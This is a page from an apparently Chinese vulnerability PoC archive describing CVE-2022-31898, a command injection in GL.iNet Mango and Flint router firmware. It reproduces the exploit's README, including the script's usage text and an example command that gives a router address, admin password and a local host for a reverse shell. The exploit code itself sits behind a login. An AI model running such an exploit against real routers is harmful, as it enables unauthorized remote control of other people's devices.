目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2022-31898 PoC — GL.iNet GL-MT300N-V2 Mango 操作系统命令注入漏洞

来源
关联漏洞
标题: GL.iNet GL-MT300N-V2 Mango 操作系统命令注入漏洞 (CVE-2022-31898)
Description:GL.iNet GL-MT300N-V2 Mango是中国GL.iNet公司的一个时尚的迷你旅行 WiFi 路由器。 GL.iNet GL-MT300N-V2 Mango v3.212版本和gl-AX1800 Flint v3.214版本存在安全漏洞,该漏洞源于通过ping_addr和trace_addr函数参数发现包含多个命令注入漏洞。
Description
Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215
介绍
# cve-2022-31898
Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215

# Usage

```
./cve-2022-31898.py -h
usage: cve-2022-31898.py [-h] -R RHOST [-P RPORT] -L LHOST [-l LPORT] [-p PWD] [-t]

options:
  -h, --help            show this help message and exit
  -R RHOST, --rhost RHOST
                        IP/hostname of Mango router
  -P RPORT, --rport RPORT
                        Port to connect to Mango router on
  -L LHOST, --lhost LHOST
                        Local host/IP for reverse shell to connect back to
  -l LPORT, --lport LPORT
                        Local port for reverse shell to connect back on
  -p PWD, --pwd PWD     Password to use to log in
  -t, --https           If set, use HTTPS
```

## Example

Exploit GL-iNet router at `192.168.8.1` over HTTPS and connect back to local box at
`192.168.8.123:8008` with admin password `password`:

```
./cve-2022-31898.py -R 192.168.8.1 -P 443 -L 192.168.8.123 -l 8008 -p password -t
```
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →